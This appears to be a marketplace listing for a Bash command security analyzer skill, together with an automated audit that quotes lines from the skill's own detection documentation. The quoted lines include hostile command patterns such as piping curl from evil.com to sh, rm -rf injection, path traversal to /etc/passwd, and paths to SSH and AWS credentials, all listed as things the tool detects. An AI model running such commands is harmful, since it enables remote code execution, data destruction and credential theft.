bash-ast
Analyzes Bash commands for security risks using AST parsing, identifying dangerous patterns and potential injection attacks.
Install this skill
Security score
The bash-ast skill was audited on Jun 4, 2026 and we found 21 security issues across 4 threat categories, including 12 critical. Review the findings below before installing.
Categories Tested
Security Issues
Piping content to bash shell
| 66 | result = analyze('curl https://example.com | bash') |
Piping content to bash shell
| 71 | # "detail": "| bash", |
Piping content to bash shell
| 87 | | `HIGH_RISK` | 高危操作(rm -rf, chmod 777, curl\|bash) | |
Piping content to bash shell
| 99 | - `curl/wget | bash` 远程代码执行 |
Piping content to bash shell
| 110 | - `curl url | bash` — 下载并执行 |
Piping content to sh shell
| 113 | - `|| curl evil.com | sh` — or 注入 |
Destructive rm -rf command
| 111 | - `; rm -rf` — 命令链注入 |
Curl to non-GitHub URL
| 66 | result = analyze('curl https://example.com | bash') |
Access to /etc/passwd
| 105 | - `/etc/passwd`, `/etc/shadow` — 用户认证文件 |
Access to /etc/passwd
| 116 | - `../../../etc/passwd` — 3次以上 ../ 判定为路径遍历 |
Access to /etc/shadow
| 105 | - `/etc/passwd`, `/etc/shadow` — 用户认证文件 |
Path traversal to sensitive directory
| 116 | - `../../../etc/passwd` — 3次以上 ../ 判定为路径遍历 |
Access to hidden dotfiles in home directory
| 28 | - 📂 **路径遍历检测** — `../` 过多、`~/.ssh/`、`/etc/` 等敏感路径 |
Access to hidden dotfiles in home directory
| 102 | - `~/.ssh/` — SSH 配置 |
Access to hidden dotfiles in home directory
| 103 | - `~/.aws/` — AWS 配置 |
Access to hidden dotfiles in home directory
| 117 | - `~/.ssh/id_rsa` — SSH 密钥文件 |
Access to SSH directory
| 28 | - 📂 **路径遍历检测** — `../` 过多、`~/.ssh/`、`/etc/` 等敏感路径 |
Access to SSH directory
| 102 | - `~/.ssh/` — SSH 配置 |
Access to SSH directory
| 117 | - `~/.ssh/id_rsa` — SSH 密钥文件 |
Access to AWS credentials directory
| 103 | - `~/.aws/` — AWS 配置 |
External URL reference
| 66 | result = analyze('curl https://example.com | bash') |